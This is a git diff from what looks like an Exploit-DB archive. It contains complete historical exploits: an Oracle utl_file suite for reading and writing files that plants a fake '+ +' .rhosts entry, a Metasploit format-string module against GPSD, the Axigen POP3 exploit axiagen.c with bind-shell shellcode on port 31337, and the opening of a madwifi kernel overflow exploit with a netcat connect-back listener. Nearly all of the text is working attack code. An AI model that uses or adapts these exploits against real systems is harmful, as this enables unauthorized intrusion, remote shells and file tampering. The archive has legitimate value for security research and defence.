=spfile; --- --- See also: http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql --- --- Usage example: --- $ sqlplus scott/tiger --- [...] --- SQL> @raptor_orafile.sql --- [...] --- SQL> exec utlwritefile('/tmp', 'mytest', '# this is a fake .rhosts file'); --- SQL> exec utlwritefile('/tmp', 'mytest', '+ +'); --- SQL> set serveroutput on; --- SQL> exec utlreadfile('/tmp', 'mytest'); --- # this is a fake .rhosts file --- + + --- End of file. 
--- - --- file reading module --- --- usage: set serveroutput on; --- exec utlreadfile('/dir', 'file'); -create or replace procedure utlreadfile(p_directory in varchar2, p_filename in varchar2) as -buffer varchar2(260); -fd utl_file.file_type; -begin - fd := utl_file.fopen(p_directory, p_filename, 'r'); - dbms_output.enable(1000000); - loop - utl_file.get_line(fd, buffer, 254); - dbms_output.put_line(buffer); - end loop; - exception when no_data_found then - dbms_output.put_line('End of file.'); - if (utl_file.is_open(fd) = true) then - utl_file.fclose(fd); - end if; - when others then - if (utl_file.is_open(fd) = true) then - utl_file.fclose(fd); - end if; -end; -/ - --- file writing module --- --- usage: exec utlwritefile('/dir', 'file', 'line to append'); -create or replace procedure utlwritefile(p_directory in varchar2, p_filename in varchar2, p_line in varchar2) as -fd utl_file.file_type; -begin - fd := utl_file.fopen(p_directory, p_filename, 'a'); -- append - utl_file.put_line(fd, p_line); - if (utl_file.is_open(fd) = true) then - utl_file.fclose(fd); - end if; -end; -/ - --- milw0rm.com [2006-12-19] +-- +-- $Id: raptor_orafile.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $ +-- +-- raptor_orafile.sql - file system access suite for oracle +-- Copyright (c) 2006 Marco Ivaldi +-- +-- This is an example file system access suite for Oracle based on the utl_file +-- package (http://www.adp-gmbh.ch/ora/plsql/utl_file.html). Use it to remotely +-- read/write OS files with the privileges of the RDBMS user, without the need +-- for any special privileges (CONNECT and RESOURCE roles are more than enough). +-- +-- The database _must_ be configured with a non-NULL utl_file_dir value +-- (preferably '*'). 
Check it using the following query: +-- SQL> select name, value from v$parameter where name = 'utl_file_dir'; +-- +-- If you have the required privileges (ALTER SYSTEM) and feel brave +-- enough to perform a DBMS shutdown/startup, you can consider modifying +-- this parameter yourself, using the following PL/SQL: +-- SQL> alter system set utl_file_dir='*' scope =spfile; +-- +-- See also: http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql +-- +-- Usage example: +-- $ sqlplus scott/tiger +-- [...] +-- SQL> @raptor_orafile.sql +-- [...] +-- SQL> exec utlwritefile('/tmp', 'mytest', '# this is a fake .rhosts file'); +-- SQL> exec utlwritefile('/tmp', 'mytest', '+ +'); +-- SQL> set serveroutput on; +-- SQL> exec utlreadfile('/tmp', 'mytest'); +-- # this is a fake .rhosts file +-- + + +-- End of file. +-- + +-- file reading module +-- +-- usage: set serveroutput on; +-- exec utlreadfile('/dir', 'file'); +create or replace procedure utlreadfile(p_directory in varchar2, p_filename in varchar2) as +buffer varchar2(260); +fd utl_file.file_type; +begin + fd := utl_file.fopen(p_directory, p_filename, 'r'); + dbms_output.enable(1000000); + loop + utl_file.get_line(fd, buffer, 254); + dbms_output.put_line(buffer); + end loop; + exception when no_data_found then + dbms_output.put_line('End of file.'); + if (utl_file.is_open(fd) = true) then + utl_file.fclose(fd); + end if; + when others then + if (utl_file.is_open(fd) = true) then + utl_file.fclose(fd); + end if; +end; +/ + +-- file writing module +-- +-- usage: exec utlwritefile('/dir', 'file', 'line to append'); +create or replace procedure utlwritefile(p_directory in varchar2, p_filename in varchar2, p_line in varchar2) as +fd utl_file.file_type; +begin + fd := utl_file.fopen(p_directory, p_filename, 'a'); -- append + utl_file.put_line(fd, p_line); + if (utl_file.is_open(fd) = true) then + utl_file.fclose(fd); + end if; +end; +/ + +-- milw0rm.com [2006-12-19] 
diff --git a/platforms/linux/remote/296.c b/platforms/linux/remote/296.c
index ca967e196..e436298b6 100755
--- a/platforms/linux/remote/296.c
+++ b/platforms/linux/remote/296.c
@@ -198,6 +198,6 @@ void printe(char *err,short e){
 if(e)exit(1);
 return;
 }
-
-
-// milw0rm.com [2004-05-05]
+
+
+// milw0rm.com [2004-05-05]
diff --git a/platforms/linux/remote/303.pl b/platforms/linux/remote/303.pl
index 3d7dc069d..3ca5b9a1a 100755
--- a/platforms/linux/remote/303.pl
+++ b/platforms/linux/remote/303.pl
@@ -147,6 +147,6 @@ print $sc $line;
 }
 close($sc);
 print "Good bye!!\n";
-
-
-# milw0rm.com [2004-06-25]
+
+
+# milw0rm.com [2004-06-25]
diff --git a/platforms/linux/remote/307.py b/platforms/linux/remote/307.py
index ab61113a9..92702125d 100755
--- a/platforms/linux/remote/307.py
+++ b/platforms/linux/remote/307.py
@@ -146,6 +146,6 @@ r = rlprd(sys.argv[1], sys.argv[2], int(sys.argv[3]))
 #r.exploit(0x0804c418, 0xbffff9e8)
 #r.force(0x0804c418, 0xbffffa00, 0xbffff800)
 r.run()
-
-
-# milw0rm.com [2004-06-25]
+
+
+# milw0rm.com [2004-06-25]
diff --git a/platforms/linux/remote/308.c b/platforms/linux/remote/308.c
index 042741741..49f58ad0c 100755
--- a/platforms/linux/remote/308.c
+++ b/platforms/linux/remote/308.c
@@ -251,6 +251,6 @@ close(clisock_fd);
 looking(work);
 return SUCCESS;
 }
-
-
-// milw0rm.com [2004-07-04]
+
+
+// milw0rm.com [2004-07-04]
diff --git a/platforms/linux/remote/3099.pm b/platforms/linux/remote/3099.pm
index d56f08c73..f90ad2a5a 100755
--- a/platforms/linux/remote/3099.pm
+++ b/platforms/linux/remote/3099.pm
@@ -1,124 +1,124 @@
-package Msf::Exploit::gpsd_format_string;
-use base "Msf::Exploit";
-use strict;
-use Pex::Text;
-use IO::Socket;
-
-my $advanced = { };
-
-my $info = {
- 'Name' => 'Berlios GPSD Format String Vulnerability',
- 'Version' => '$ 1.0 $',
- 'Authors' => [ 'Enseirb ', ],
- 'Arch' => [ 'x86' ],
- 'OS' => [ 'linux' ],
- 'Priv' => 1,
-
- 'UserOpts' =>
- {
- 'RHOST' => [1, 'ADDR', 'The target address'],
- 'RPORT' => [1, 'PORT', 'The target port', 2947],
-
- },
-
- 'Payload' =>
- {
- 'Space' => 1004,
- 'BadChars' => "\x00\x0a\x0d\x0c",
- },
-
- 'Targets' =>
-
- [
- [ "gpsd-1.91-1.i386.rpm", 0x0804f250,0x41424344 ], # .rpms Tested on Redhat 9.0
- [ "gpsd-1.92-1.i386.rpm", 0x0804f630,0x41424344 ],
- [ "gpsd-1.93-1.i386.rpm", 0x0804e154,0x41424344 ],
- [ "gpsd-1.94-1.i386.rpm", 0x0804f260,0x41424344 ],
- [ "gpsd-1.95-1.i386.rpm", 0x0804f268,0x41424344 ],
- [ "gpsd-1.96-1.i386.rpm", 0x41424344,0x41424344 ],
- [ "gpsd-1.97-1.i386.rpm", 0x0804b14c,0x41424344 ],
- [ "gpsd-2.1-1.i386.rpm", 0x0804c7a0,0x41424344 ],
- [ "gpsd-2.2-1.i386.rpm", 0x0804c7a0,0x41424344 ],
- [ "gpsd-2.3-1.i386.rpm", 0x0804c730,0xbfffd661 ],
- [ "gpsd-2.4-1.i386.rpm", 0x0804c7b8,0xbfffde71 ],
- [ "gpsd-2.5-1.i386.rpm", 0x0804c7dc,0xbfffdc09 ],
- [ "gpsd-2.6-1.i386.rpm", 0x0804c730,0xbffff100 ],
- [ "gpsd-2.7-1.i386.rpm", 0x0804c5bc,0xbfffcabc ],
- [ "gpsd_2.6-1_i386.deb", 0x0804c7c4,0xbfffedc8 ],
- [ "gpsd_2.7-1_i386.deb", 0x0804c6c4,0xbfffc818 ],
- [ "gpsd_2.7-2_i386.deb", 0x0804c770,0xbfffee70 ],
- ["SuSE 9.1 compiled 2.0", 0x0804c818,0xbfffe148 ],
- [ "Slackware 9.0 compiled 2.0", 0x0804b164,0xbfffd7d6 ],
- [ "Slackware 9.0 compiled 2.7 ", 0x0804c3ec,0xbfffe65c ],
- [ "Debug ", 0x41424344,0xdeadbeef ],
- ],
-
-
- 'Description' =>
- Pex::Text::Freeform(qq{
- This module exploits a format string vulnerability in the Berlios GPSD server.
- This vulnerability was discovered by Kevin Finisterre.
- }),
-
- 'Keys' => ['gpsd'],
-
- 'DisclosureDate' => 'May 25 2005',
-
- };
-
-sub new {
- my $class = shift;
- my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
- return($self);
-}
-
-sub Exploit {
- my $self = shift;
- my $target_idx = $self->GetVar('TARGET');
- my $target_host = $self->GetVar('RHOST');
- my $target_port = $self->GetVar('RPORT');
- my $shellcode = $self->GetVar('EncodedPayload')->Payload;
- my $target = $self->Targets->[$target_idx];
-
- $self->Print("[*] Reading information from target " . $target_host . ": ");
-
- my $offset = 17;
- my $dump_fmt = 7;
- my $al = 3;
- my ($hi,$lo);
- my ($shift0,$shift1);
- my $buf;
-
- $hi = ($target->[2] >> 0) & 0xffff;
- $lo = ($target->[2] >> 16) & 0xffff;
-
- $shift0 = sprintf("%d",$hi) - sprintf("%d",$offset) - ($dump_fmt * 8 + 16 + $al);
- $shift1 = (sprintf("%d",0x10000) + sprintf("%d",$lo)) - sprintf("%d",$hi);
-
- $buf = "A" x 3 . "B" x 4;
- $buf .= pack('V',$target->[1]);
- $buf .= "B" x 4;
- $buf .= pack('V',$target->[1] + 0x2);
- $buf .= "%.8x" x7 ."%.".$shift0."lx%hn"."%.".$shift1."lx%hn";
- $buf .= $self->MakeNops(3000) . $shellcode ;
-
- my $s = Msf::Socket::Tcp->new
- (
- 'PeerAddr' => $target_host,
- 'PeerPort' => $target_port,
- );
-
- if ($s->IsError) {
- $self->PrintLine('[*] Error creating socket: ' .
$s->GetError);
- return;
- }
-
- $s->Send($buf);
- $s->Close();
-
- return;
-}
-
-1;
-
-# milw0rm.com [2007-01-08]
+package Msf::Exploit::gpsd_format_string;
+use base "Msf::Exploit";
+use strict;
+use Pex::Text;
+use IO::Socket;
+
+my $advanced = { };
+
+my $info = {
+ 'Name' => 'Berlios GPSD Format String Vulnerability',
+ 'Version' => '$ 1.0 $',
+ 'Authors' => [ 'Enseirb ', ],
+ 'Arch' => [ 'x86' ],
+ 'OS' => [ 'linux' ],
+ 'Priv' => 1,
+
+ 'UserOpts' =>
+ {
+ 'RHOST' => [1, 'ADDR', 'The target address'],
+ 'RPORT' => [1, 'PORT', 'The target port', 2947],
+
+ },
+
+ 'Payload' =>
+ {
+ 'Space' => 1004,
+ 'BadChars' => "\x00\x0a\x0d\x0c",
+ },
+
+ 'Targets' =>
+
+ [
+ [ "gpsd-1.91-1.i386.rpm", 0x0804f250,0x41424344 ], # .rpms Tested on Redhat 9.0
+ [ "gpsd-1.92-1.i386.rpm", 0x0804f630,0x41424344 ],
+ [ "gpsd-1.93-1.i386.rpm", 0x0804e154,0x41424344 ],
+ [ "gpsd-1.94-1.i386.rpm", 0x0804f260,0x41424344 ],
+ [ "gpsd-1.95-1.i386.rpm", 0x0804f268,0x41424344 ],
+ [ "gpsd-1.96-1.i386.rpm", 0x41424344,0x41424344 ],
+ [ "gpsd-1.97-1.i386.rpm", 0x0804b14c,0x41424344 ],
+ [ "gpsd-2.1-1.i386.rpm", 0x0804c7a0,0x41424344 ],
+ [ "gpsd-2.2-1.i386.rpm", 0x0804c7a0,0x41424344 ],
+ [ "gpsd-2.3-1.i386.rpm", 0x0804c730,0xbfffd661 ],
+ [ "gpsd-2.4-1.i386.rpm", 0x0804c7b8,0xbfffde71 ],
+ [ "gpsd-2.5-1.i386.rpm", 0x0804c7dc,0xbfffdc09 ],
+ [ "gpsd-2.6-1.i386.rpm", 0x0804c730,0xbffff100 ],
+ [ "gpsd-2.7-1.i386.rpm", 0x0804c5bc,0xbfffcabc ],
+ [ "gpsd_2.6-1_i386.deb", 0x0804c7c4,0xbfffedc8 ],
+ [ "gpsd_2.7-1_i386.deb", 0x0804c6c4,0xbfffc818 ],
+ [ "gpsd_2.7-2_i386.deb", 0x0804c770,0xbfffee70 ],
+ ["SuSE 9.1 compiled 2.0", 0x0804c818,0xbfffe148 ],
+ [ "Slackware 9.0 compiled 2.0", 0x0804b164,0xbfffd7d6 ],
+ [ "Slackware 9.0 compiled 2.7 ", 0x0804c3ec,0xbfffe65c ],
+ [ "Debug ", 0x41424344,0xdeadbeef ],
+ ],
+
+
+ 'Description' =>
+ Pex::Text::Freeform(qq{
+ This module exploits a format string vulnerability in the Berlios GPSD server.
+ This vulnerability was discovered by Kevin Finisterre.
+ }),
+
+ 'Keys' => ['gpsd'],
+
+ 'DisclosureDate' => 'May 25 2005',
+
+ };
+
+sub new {
+ my $class = shift;
+ my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+ return($self);
+}
+
+sub Exploit {
+ my $self = shift;
+ my $target_idx = $self->GetVar('TARGET');
+ my $target_host = $self->GetVar('RHOST');
+ my $target_port = $self->GetVar('RPORT');
+ my $shellcode = $self->GetVar('EncodedPayload')->Payload;
+ my $target = $self->Targets->[$target_idx];
+
+ $self->Print("[*] Reading information from target " . $target_host . ": ");
+
+ my $offset = 17;
+ my $dump_fmt = 7;
+ my $al = 3;
+ my ($hi,$lo);
+ my ($shift0,$shift1);
+ my $buf;
+
+ $hi = ($target->[2] >> 0) & 0xffff;
+ $lo = ($target->[2] >> 16) & 0xffff;
+
+ $shift0 = sprintf("%d",$hi) - sprintf("%d",$offset) - ($dump_fmt * 8 + 16 + $al);
+ $shift1 = (sprintf("%d",0x10000) + sprintf("%d",$lo)) - sprintf("%d",$hi);
+
+ $buf = "A" x 3 . "B" x 4;
+ $buf .= pack('V',$target->[1]);
+ $buf .= "B" x 4;
+ $buf .= pack('V',$target->[1] + 0x2);
+ $buf .= "%.8x" x7 ."%.".$shift0."lx%hn"."%.".$shift1."lx%hn";
+ $buf .= $self->MakeNops(3000) . $shellcode ;
+
+ my $s = Msf::Socket::Tcp->new
+ (
+ 'PeerAddr' => $target_host,
+ 'PeerPort' => $target_port,
+ );
+
+ if ($s->IsError) {
+ $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+ return;
+ }
+
+ $s->Send($buf);
+ $s->Close();
+
+ return;
+}
+
+1;
+
+# milw0rm.com [2007-01-08]
diff --git a/platforms/linux/remote/3329.c b/platforms/linux/remote/3329.c
index 21200d5e1..1687773c1 100755
--- a/platforms/linux/remote/3329.c
+++ b/platforms/linux/remote/3329.c
@@ -1,247 +1,247 @@
-/* axiagen.c
- *
- * Axigen eMail Server v2.0 (beta)
- * by fuGich Tue Dec 5 2006
- *
- * thanks to mu-b
- *
- * - Tested on: Axigen V2 (beta)
- *
- * logType for the pop3 service must be "system" and
- * the logLevel set to any number with 4th bit set
- *
- * remote shell format string vulnerability in pop3
- * /bin/sh to bind to port 31337
- *
- * optimised format string generated with libforSC
- * used hhn for writes, could have been hn's but this was small enough and reduces size of log entry generated
- *
- */
-
-#include
-#include
-#include
-#include
-#include
-
-
-#define DEF_PORT 110
-#define PORT_POP3 DEF_PORT
-
-
-char formatString[] =
-
- // plt fixup code
-
- "\xba\xd8\xbe\x85\x09" // mov $0x985bed8,%edx
- "\xc7\x02\x9a\xf0\x04\x08" // movl $0x804f09a,(%edx)
- "\x8d\x52\x04" // lea 0x4(%edx),%edx
- "\xc6\x02\xaa" // movb $0xaa,(%edx)
- "\x90\x90\x90" // make divisible by 8
-
- //
- // bind shell with fork to port 31337 98 bytes
- //
-
- "\x6a\x66" // push $0x66
- "\x58" // pop %eax
- "\x99" // cltd
- "\x6a\x01" // push $0x1
- "\x5b" // pop %ebx
- "\x52" // push %edx
- "\x53" // push %ebx
- "\x6a\x02" // push $0x2
-
- //
- // <_doint>:
- //
-
- "\x89\xe1" // mov %esp,%ecx
- "\xcd\x80" // int $0x80
-
- "\x5b" // pop %ebx
- "\x5d" // pop %ebp
- "\x52" // push %edx
- "\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337)
- "\x0f\xcd" // bswap %ebp
- "\x09\xdd" // or %ebx,%ebp
- "\x55" // push %ebp
- "\x6a\x10" // push $0x10
- "\x51" // push %ecx
- "\x50" // push %eax
- "\x89\xe1" // mov %esp,%ecx
- "\xb0\x66" // mov $0x66,%al
- "\xcd\x80" // int $0x80
- "\xb3\x04" // mov $0x4,%bl
- "\xb0\x66" // mov $0x66,%al
- "\xcd\x80" // int $0x80
-
- //
- // <_acceptloop>:
- //
-
- "\x5f" // pop %edi
- "\x50" // push %eax
- "\x50" // push %eax
- "\x57" // push %edi
- "\x89\xe1" // mov %esp,%ecx
- "\x43" // inc %ebx
- "\xb0\x66" // mov $0x66,%al
- "\xcd\x80" // int $0x80
- "\x93" // xchg %eax,%ebx
- "\xb0\x02" // mov $0x2,%al
- "\xcd\x80" // int
$0x80
- "\x85\xc0" // test %eax,%eax
- "\x75\x1a" // jne <_parent>
- "\x59" // pop %ecx
-
- //
- // <_dup2loop>:
- //
-
- "\xb0\x3f" // mov $0x3f,%al
- "\xcd\x80" // int $0x80
- "\x49" // dec %ecx
- "\x79\xf9" // jns <_dup2loop>
-
- "\xb0\x0b" // mov $0xb,%al
- "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
- "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
- "\x89\xe3" // mov %esp,%ebx
- "\x52" // push %edx
- "\x53" // push %ebx
- "\xeb\xb2" // jmp <_doint>
-
- //
- // <_parent>:
- //
-
- "\x6a\x06" // push $0x6
- "\x58" // pop %eax
- "\xcd\x80" // int $0x80
- "\xb3\x04" // mov $0x4,%bl
- "\xeb\xc9" // jmp <_acceptloop>
-
- //
- // 9 write addresses
- //
-
- "\xd8\xbe\x85\x09" // pointer @ 0x0985bed8
- "\xd9\xbe\x85\x09"
- "\xda\xbe\x85\x09"
- "\xdb\xbe\x85\x09"
- "\xe0\xbe\x85\x09" // place shell code @ 0x0985bee0
- "\xe1\xbe\x85\x09"
- "\xe2\xbe\x85\x09"
- "\xe3\xbe\x85\x09"
- "\xe4\xbe\x85\x09"
-
- // add the format string
-
- "%18u%66$n%34u%65$hhn%31u%72$hhn%10u%68$hhn%31u%71$hhn%87u%70$hhn%14u%69$hhn%90u%73$hhn%158u%67$hhn\r\n";
-
-
-static int sock_send (int sock, u_char * src, int len);
-static void formatme (u_char * host);
-static int sockami (u_char * host, int port);
-void shell (int sock);
-
-void shell (int sock){ /* Attach to Remote Shell */
-
- int l;
- char buf[512];
- fd_set rfds;
-
- while (1) {
- FD_SET (0, &rfds);
- FD_SET (sock, &rfds);
- select (sock + 1, &rfds, NULL, NULL, NULL);
- if (FD_ISSET (0, &rfds)) {
- l = read (0, buf, sizeof (buf));
- if (l <= 0) {
- printf("\n - Connection closed by local user\n");
- exit (EXIT_FAILURE);
- }
- write (sock, buf, l);
- }
- if (FD_ISSET (sock, &rfds)) {
- l = read (sock, buf, sizeof (buf));
- if (l == 0) {
- printf ("\n - Connection closed by remote host.\n");
- exit (EXIT_FAILURE);
- } else if (l < 0) {
- printf ("\n - Read failure\n");
- exit (EXIT_FAILURE);
- }
- write (1, buf, l);
- }
- }
-}
-
-static int sock_send (int sock, u_char * src, int len){ /* send data to the open socket */
-
- int sbytes;
-
sbytes = send (sock, src, len, 0);
- return (sbytes);
-}
-
-static int sockami (u_char * host, int port){ /* create the socket */
-
- struct sockaddr_in address;
- struct hostent *hp;
- int sock;
-
- fflush (stdout);
- if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1){
- perror ("socket()");
- exit (-1);
- }
-
- if ((hp = gethostbyname (host)) == NULL){
- perror ("gethostbyname()");
- exit (-1);
- }
-
- memset (&address, 0, sizeof (address));
- memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
- address.sin_family = AF_INET;
- address.sin_port = htons (port);
-
- if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1){
- perror ("connect()");
- exit (EXIT_FAILURE);
- }
- return (sock);
-}
-
-static void formatme (u_char * host){ /* do the evil */
-
- int sock;
- printf ("+Connecting to %s:%d ", host, PORT_POP3);
- sock = sockami (host, PORT_POP3);
- printf ("\n+Sending format string\n");
- sock_send (sock, formatString, strlen (formatString));
- fflush (stdout);
- sleep(2);
- printf ("+Connecting to Shell ");
- sock = sockami (host, 31337);
- printf ("- Done\n");
- shell(sock);
-
-}
-
-int main (int argc, char **argv){ /* go figure */
-
- printf ("Axigen 2.0 beta Remote pop3 exploit\n"
- "by: \n\n");
-
- if (argc <= 1)
- {
- fprintf (stderr, "Usage: %s \n\n", argv[0]);
- exit (EXIT_SUCCESS);
- }
-
- formatme (argv[1]);
-}
-
-// milw0rm.com [2007-02-18]
+/* axiagen.c
+ *
+ * Axigen eMail Server v2.0 (beta)
+ * by fuGich Tue Dec 5 2006
+ *
+ * thanks to mu-b
+ *
+ * - Tested on: Axigen V2 (beta)
+ *
+ * logType for the pop3 service must be "system" and
+ * the logLevel set to any number with 4th bit set
+ *
+ * remote shell format string vulnerability in pop3
+ * /bin/sh to bind to port 31337
+ *
+ * optimised format string generated with libforSC
+ * used hhn for writes, could have been hn's but this was small enough and reduces size of log entry generated
+ *
+ */
+
+#include
+#include
+#include
+#include
+#include
+
+
+#define
DEF_PORT 110
+#define PORT_POP3 DEF_PORT
+
+
+char formatString[] =
+
+ // plt fixup code
+
+ "\xba\xd8\xbe\x85\x09" // mov $0x985bed8,%edx
+ "\xc7\x02\x9a\xf0\x04\x08" // movl $0x804f09a,(%edx)
+ "\x8d\x52\x04" // lea 0x4(%edx),%edx
+ "\xc6\x02\xaa" // movb $0xaa,(%edx)
+ "\x90\x90\x90" // make divisible by 8
+
+ //
+ // bind shell with fork to port 31337 98 bytes
+ //
+
+ "\x6a\x66" // push $0x66
+ "\x58" // pop %eax
+ "\x99" // cltd
+ "\x6a\x01" // push $0x1
+ "\x5b" // pop %ebx
+ "\x52" // push %edx
+ "\x53" // push %ebx
+ "\x6a\x02" // push $0x2
+
+ //
+ // <_doint>:
+ //
+
+ "\x89\xe1" // mov %esp,%ecx
+ "\xcd\x80" // int $0x80
+
+ "\x5b" // pop %ebx
+ "\x5d" // pop %ebp
+ "\x52" // push %edx
+ "\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337)
+ "\x0f\xcd" // bswap %ebp
+ "\x09\xdd" // or %ebx,%ebp
+ "\x55" // push %ebp
+ "\x6a\x10" // push $0x10
+ "\x51" // push %ecx
+ "\x50" // push %eax
+ "\x89\xe1" // mov %esp,%ecx
+ "\xb0\x66" // mov $0x66,%al
+ "\xcd\x80" // int $0x80
+ "\xb3\x04" // mov $0x4,%bl
+ "\xb0\x66" // mov $0x66,%al
+ "\xcd\x80" // int $0x80
+
+ //
+ // <_acceptloop>:
+ //
+
+ "\x5f" // pop %edi
+ "\x50" // push %eax
+ "\x50" // push %eax
+ "\x57" // push %edi
+ "\x89\xe1" // mov %esp,%ecx
+ "\x43" // inc %ebx
+ "\xb0\x66" // mov $0x66,%al
+ "\xcd\x80" // int $0x80
+ "\x93" // xchg %eax,%ebx
+ "\xb0\x02" // mov $0x2,%al
+ "\xcd\x80" // int $0x80
+ "\x85\xc0" // test %eax,%eax
+ "\x75\x1a" // jne <_parent>
+ "\x59" // pop %ecx
+
+ //
+ // <_dup2loop>:
+ //
+
+ "\xb0\x3f" // mov $0x3f,%al
+ "\xcd\x80" // int $0x80
+ "\x49" // dec %ecx
+ "\x79\xf9" // jns <_dup2loop>
+
+ "\xb0\x0b" // mov $0xb,%al
+ "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
+ "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
+ "\x89\xe3" // mov %esp,%ebx
+ "\x52" // push %edx
+ "\x53" // push %ebx
+ "\xeb\xb2" // jmp <_doint>
+
+ //
+ // <_parent>:
+ //
+
+ "\x6a\x06" // push $0x6
+ "\x58" // pop %eax
+ "\xcd\x80" // int $0x80
+ "\xb3\x04" // mov $0x4,%bl
+ "\xeb\xc9" // jmp
<_acceptloop>
+
+ //
+ // 9 write addresses
+ //
+
+ "\xd8\xbe\x85\x09" // pointer @ 0x0985bed8
+ "\xd9\xbe\x85\x09"
+ "\xda\xbe\x85\x09"
+ "\xdb\xbe\x85\x09"
+ "\xe0\xbe\x85\x09" // place shell code @ 0x0985bee0
+ "\xe1\xbe\x85\x09"
+ "\xe2\xbe\x85\x09"
+ "\xe3\xbe\x85\x09"
+ "\xe4\xbe\x85\x09"
+
+ // add the format string
+
+ "%18u%66$n%34u%65$hhn%31u%72$hhn%10u%68$hhn%31u%71$hhn%87u%70$hhn%14u%69$hhn%90u%73$hhn%158u%67$hhn\r\n";
+
+
+static int sock_send (int sock, u_char * src, int len);
+static void formatme (u_char * host);
+static int sockami (u_char * host, int port);
+void shell (int sock);
+
+void shell (int sock){ /* Attach to Remote Shell */
+
+ int l;
+ char buf[512];
+ fd_set rfds;
+
+ while (1) {
+ FD_SET (0, &rfds);
+ FD_SET (sock, &rfds);
+ select (sock + 1, &rfds, NULL, NULL, NULL);
+ if (FD_ISSET (0, &rfds)) {
+ l = read (0, buf, sizeof (buf));
+ if (l <= 0) {
+ printf("\n - Connection closed by local user\n");
+ exit (EXIT_FAILURE);
+ }
+ write (sock, buf, l);
+ }
+ if (FD_ISSET (sock, &rfds)) {
+ l = read (sock, buf, sizeof (buf));
+ if (l == 0) {
+ printf ("\n - Connection closed by remote host.\n");
+ exit (EXIT_FAILURE);
+ } else if (l < 0) {
+ printf ("\n - Read failure\n");
+ exit (EXIT_FAILURE);
+ }
+ write (1, buf, l);
+ }
+ }
+}
+
+static int sock_send (int sock, u_char * src, int len){ /* send data to the open socket */
+
+ int sbytes;
+ sbytes = send (sock, src, len, 0);
+ return (sbytes);
+}
+
+static int sockami (u_char * host, int port){ /* create the socket */
+
+ struct sockaddr_in address;
+ struct hostent *hp;
+ int sock;
+
+ fflush (stdout);
+ if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1){
+ perror ("socket()");
+ exit (-1);
+ }
+
+ if ((hp = gethostbyname (host)) == NULL){
+ perror ("gethostbyname()");
+ exit (-1);
+ }
+
+ memset (&address, 0, sizeof (address));
+ memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
+ address.sin_family = AF_INET;
+ address.sin_port = htons (port);
+
+ if (connect (sock,
(struct sockaddr *) &address, sizeof (address)) == -1){
+ perror ("connect()");
+ exit (EXIT_FAILURE);
+ }
+ return (sock);
+}
+
+static void formatme (u_char * host){ /* do the evil */
+
+ int sock;
+ printf ("+Connecting to %s:%d ", host, PORT_POP3);
+ sock = sockami (host, PORT_POP3);
+ printf ("\n+Sending format string\n");
+ sock_send (sock, formatString, strlen (formatString));
+ fflush (stdout);
+ sleep(2);
+ printf ("+Connecting to Shell ");
+ sock = sockami (host, 31337);
+ printf ("- Done\n");
+ shell(sock);
+
+}
+
+int main (int argc, char **argv){ /* go figure */
+
+ printf ("Axigen 2.0 beta Remote pop3 exploit\n"
+ "by: \n\n");
+
+ if (argc <= 1)
+ {
+ fprintf (stderr, "Usage: %s \n\n", argv[0]);
+ exit (EXIT_SUCCESS);
+ }
+
+ formatme (argv[1]);
+}
+
+// milw0rm.com [2007-02-18]
diff --git a/platforms/linux/remote/3389.c b/platforms/linux/remote/3389.c
index 8739411a0..c3bcb6310 100755
--- a/platforms/linux/remote/3389.c
+++ b/platforms/linux/remote/3389.c
@@ -1,387 +1,387 @@ -/* ---- madwifi WPA/RSN IE remote kernel buffer overflow ------ - * expoit code by: sgrakkyu antifork.org -- 10/1/2007 - * - * CVE: 2006-6332 (Laurent BUTTI, Jerome RAZNIEWSKI, Julien TINNES) - * - * (for wpa) - * .... - * memcpy(buf, se->se_wpa_ie, se->se_wpa_ie[1] + 2) - * .... - * .... - * the function re-uses args in the stack before returning so we - * can't trash them overwriting. - * Different compiled module [ex. different version of gcc] may require - * a different pad value.. (see -g option) - * - * ex: - * on one terminal runs: nc -l -p 31337 - * phi:~/kexec/lorcon# gcc -g -o madwifi_exp madwifi_exp.c -lorcon - * phi:~/kexec/lorcon# wlanconfig ath1 create wlandev wifi0 wlanmode monitor - * phi:~/kexec/lorcon# ifconfig ath1 up - * phi:~/kexec/lorcon# ./madwifi_exp -i ath1 -d madwifing -a 10.0.0.1 -p 31337 - * [opt-ip]: 10.0.0.1 - * [opt-port]: 31337 - * [opt-iface]: ath1 - * [opt-driver]: madwifing - * [opt-jump]: 0xffffe777 - * [pad]: 36 - * - * [*][Low Avail Byte]: 103 - * [*][High Avail Byte]: 47 - * [*][u_code[] (high)size]: 91, [ring0_code[] (low)size]: 47 - * [*][ patching jump ]: [eba7] - * [*][Payload space]: 192 - * [*][beacon_frame-80211]=54 - * [*][beacon_WPA_IE_lenght]: 198 - * - * [printing frame - start] - * 80 00 00 00 ff ff ff ff ff ff cc cc cc cc cc cc - * cc cc cc cc cc cc 00 00 00 00 00 00 00 00 00 00 - * 64 00 01 00 00 03 41 41 41 01 08 82 84 8b 96 0c - * 18 30 48 03 01 0b dd c6 00 50 f2 01 01 00 90 90 - * 90 90 90 90 90 90 90 90 90 90 31 c0 89 c3 40 40 - * .... - * .... - * - * - * Tuning option: - * - depending on gcc version/optimization we have to change the padding of vector - * payload, take a look to the following disassembly of the module wlan.o compiled - * with gcc-4.0 (kernel compiled for i586): - * - * 00015a49 : - * 15a49: 55 push %ebp - * 15a4a: 57 push %edi - * 15a4b: 56 push %esi - * 15a4c: 53 push %ebx - * 15a4d: 81 ec c4 00 00 00 sub $0xbc,%esp <--16+188=[204] - * ......... - * ......... 
